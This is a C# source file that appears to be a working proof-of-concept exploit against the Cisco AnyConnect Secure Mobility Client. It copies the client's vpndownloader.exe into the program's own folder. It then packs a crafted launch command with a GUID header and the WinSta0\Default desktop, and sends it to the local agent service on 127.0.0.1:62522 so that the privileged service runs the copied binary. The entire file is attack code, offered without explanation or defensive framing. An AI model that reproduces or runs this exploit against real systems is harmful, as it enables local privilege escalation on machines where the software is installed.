using System;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;

class MainClass {

   static byte[] PackCommand(byte[] data) {
       MemoryStream stm = new MemoryStream();
       BinaryWriter writer = new BinaryWriter(stm);

       writer.Write(0x4353434f);
       writer.Write((ushort)0x1A);
       writer.Write((ushort)data.Length);
       writer.Write(Guid.NewGuid().ToByteArray());
       writer.Write((byte)1);
       writer.Write((byte)2);
       writer.Write(data);

       return stm.ToArray();
   }

   static byte[] SwapShort(ushort s) {
       byte[] bs = BitConverter.GetBytes(s);
       
       byte tmp = bs[0];
       bs[0] = bs[1];
       bs[1] = tmp;

       return bs;
   }

   static void PackString(BinaryWriter writer, int index, string s) {
       writer.Write(SwapShort((ushort)index));
       byte[] bs = Encoding.ASCII.GetBytes(s+"\0");
       writer.Write(SwapShort((ushort)bs.Length));
       writer.Write(bs);
   }

   static byte[] PackLaunchCommand(string path, string cmdline, string desktop) {
       MemoryStream stm = new MemoryStream();
       BinaryWriter writer = new BinaryWriter(stm);

       PackString(writer, 1, path);
       PackString(writer, 2, cmdline);
       PackString(writer, 4, desktop);

       return stm.ToArray();
   }       

   static string GetBasePath() {
       string codebase = Assembly.GetExecutingAssembly().CodeBase;

        return Path.GetDirectoryName(new Uri(codebase, UriKind.Absolute).LocalPath);
   }

   static string GetProgramFiles() {
      return Environment.GetFolderPath(Environment.Is64BitOperatingSystem ? 
                 Environment.SpecialFolder.ProgramFilesX86 : Environment.SpecialFolder.ProgramFiles);
   }

   public static void Main() {
      try {
         string dirpath = Path.Combine(GetBasePath(), "vpndownloader.exe");
         string progpath = Path.Combine(GetProgramFiles(), "Cisco", 
           "Cisco AnyConnect Secure Mobility Client","vpndownloader.exe");

         File.Copy(progpath, dirpath, true);
         byte[] data = PackCommand(PackLaunchCommand(dirpath, 
                  "ABC", @"WinSta0\Default"));

         TcpClient client = new TcpClient("127.0.0.1", 62522);
         NetworkStream stm = client.GetStream();
         stm.ReadTimeout = 5000;
         stm.Write(data, 0, data.Length);
         stm.Flush();
         stm.ReadByte();
         client.Close();
      } catch(Exception ex) {
          Console.WriteLine(ex);
      }
   }
}